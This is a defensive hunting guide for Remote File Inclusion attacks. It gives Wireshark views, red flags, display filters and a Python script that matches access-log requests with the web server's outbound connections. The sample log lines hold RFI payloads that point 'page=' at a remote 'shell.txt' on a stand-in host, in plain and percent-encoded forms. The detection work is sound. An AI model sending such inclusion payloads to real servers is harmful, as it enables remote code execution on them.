Operator On The Wire

RFI

The attacker supplies a full URL in an include-style parameter (file=, page=, include=) so that the application fetches and executes a remote file. Because the web server, not the client, performs that fetch, the evidence comes in two halves: the inbound request carrying the URL, and the server's own outbound connection to the referenced host immediately afterwards.


Hunting

Statistics → Conversations → IPv4 (the web server appearing as a client to an external host it has no reason to contact)
Statistics → Endpoints → IPv4 (new external endpoints showing up around the time of the suspect request)
Statistics → Protocol Hierarchy (HTTP or TLS originating from the web server rather than terminating on it)
Statistics → IO Graph (burst of outbound traffic from the web server right after the request)


Red Flags

  • Full URLs inside parameters (http://, https://)
  • file=, page=, include= pointing to external domains
  • URL-encoded remote references (http%3A%2F%2F), including double-encoded forms (http%253A%252F%252F)
  • Immediate outbound connection from the web server to the host named in the parameter
  • 200 response whose body is not the normal page (script or command output), followed by further outbound connections or other unusual server behaviour

Filters

# Generic external URL anywhere in the request URI (noisy: redirect, callback and proxy parameters also carry full URLs; triage by parameter name and by whether the server then connected out)
http.request.uri contains "http://" or http.request.uri contains "https://"

# Direct remote URL inclusion attempt in an include-style parameter
http.request.uri matches "(?i)(file=|page=|include=).*https?://"

# URL-encoded remote inclusion (covers http:// and https://; double-encoded forms such as http%253A%252F%252F need a separate pattern)
http.request.uri matches "(?i)(file=|page=|include=).*https?%3A%2F%2F"

# Include-style parameters from one suspect source (replace the address with the host under investigation)
http.request.uri matches "(?i)(file=|page=|include=)" and ip.src == 192.168.10.5
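The same two checks the filters express (a remote URL in a request parameter, then the web server's own outbound connection to that host) can be run over exported logs instead of a live capture. The following is an added example written for this page, not code from the original or from any tool it mentions. It assumes Apache/nginx combined-format access-log lines and a list of outbound connections from the web server (as you would export from Conversations → IPv4 or a Zeek conn.log); all sample data is constructed and the function names are the example's own.

```python
"""RFI hunting logic mirrored in Python over constructed sample data.

Decodes each query parameter (including double encoding), flags values
that resolve to an http(s) URL, and marks a finding confirmed when the
web server itself connected to the referenced host shortly afterwards.
"""
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter names called out on this page; any other parameter carrying a
# URL is still reported, just with include_param=False (the noisy case).
INCLUDE_PARAMS = {"file", "page", "include"}
URL_RE = re.compile(r"^\s*https?://", re.IGNORECASE)

# Apache/nginx combined-format prefix: src, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_param(value, rounds=2):
    """Undo up to `rounds` extra layers of percent-encoding (double encoding)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def rfi_indicators(uri):
    """Return [(param, decoded_value, host)] for every parameter whose
    value, after decoding, is an http(s) URL."""
    hits = []
    # parse_qsl already decodes one layer; decode_param handles the rest.
    for name, raw in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        value = decode_param(raw)
        if URL_RE.match(value):
            host = urlsplit(value.strip()).hostname or ""
            hits.append((name.lower(), value, host))
    return hits


def parse_ts(text):
    return datetime.strptime(text, "%d/%b/%Y:%H:%M:%S %z")


def scan_log(lines):
    """Apply rfi_indicators to each access-log line that parses."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, url, host in rfi_indicators(m["uri"]):
            findings.append({
                "src": m["src"], "ts": parse_ts(m["ts"]), "status": int(m["status"]),
                "param": param, "url": url, "host": host,
                "include_param": param in INCLUDE_PARAMS,
            })
    return findings


def hunt(lines, outbound, window_seconds=5):
    """Mark a finding confirmed when the web server connected to the
    referenced host within `window_seconds` after the request."""
    window = timedelta(seconds=window_seconds)
    findings = scan_log(lines)
    for f in findings:
        f["confirmed"] = any(
            host == f["host"] and timedelta(0) <= ts - f["ts"] <= window
            for ts, host, _port in outbound
        )
    return findings


# Constructed sample data (not real traffic): three RFI attempts with plain,
# single- and double-encoded URLs, a benign page load, and a redirect
# parameter that the generic "contains http://" filter would also flag.
LOG_LINES = [
    '203.0.113.7 - - [10/Mar/2024:14:02:11 +0000] "GET /index.php?page=http://203.0.113.99/shell.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Mar/2024:14:02:13 +0000] "GET /index.php?page=http%3A%2F%2F203.0.113.99%2Fshell.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Mar/2024:14:02:15 +0000] "GET /index.php?page=HTTPS%253A%252F%252F203.0.113.99%252Fshell.txt HTTP/1.1" 200 512',
    '198.51.100.20 - - [10/Mar/2024:14:03:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048',
    '198.51.100.21 - - [10/Mar/2024:14:04:02 +0000] "GET /redirect?url=https://www.example.com/ HTTP/1.1" 302 0',
]
# Outbound connections made by the web server (constructed), as
# (timestamp, destination host, destination port).
UTC = timezone.utc
OUTBOUND = [
    (datetime(2024, 3, 10, 14, 2, 12, tzinfo=UTC), "203.0.113.99", 80),
    (datetime(2024, 3, 10, 14, 2, 16, tzinfo=UTC), "203.0.113.99", 443),
    (datetime(2024, 3, 10, 14, 5, 0, tzinfo=UTC), "updates.example.org", 443),
]

if __name__ == "__main__":
    for f in hunt(LOG_LINES, OUTBOUND):
        flag = "CONFIRMED" if f["confirmed"] else "suspect  "
        print(f"{flag} {f['src']} {f['param']}={f['url']} include_param={f['include_param']}")
```

The redirect line is reported but neither names an include-style parameter nor produces a matching outbound connection, which is exactly the triage the generic filter leaves to the analyst; the three page= requests are reported with the server's follow-up connection to 203.0.113.99 as corroboration.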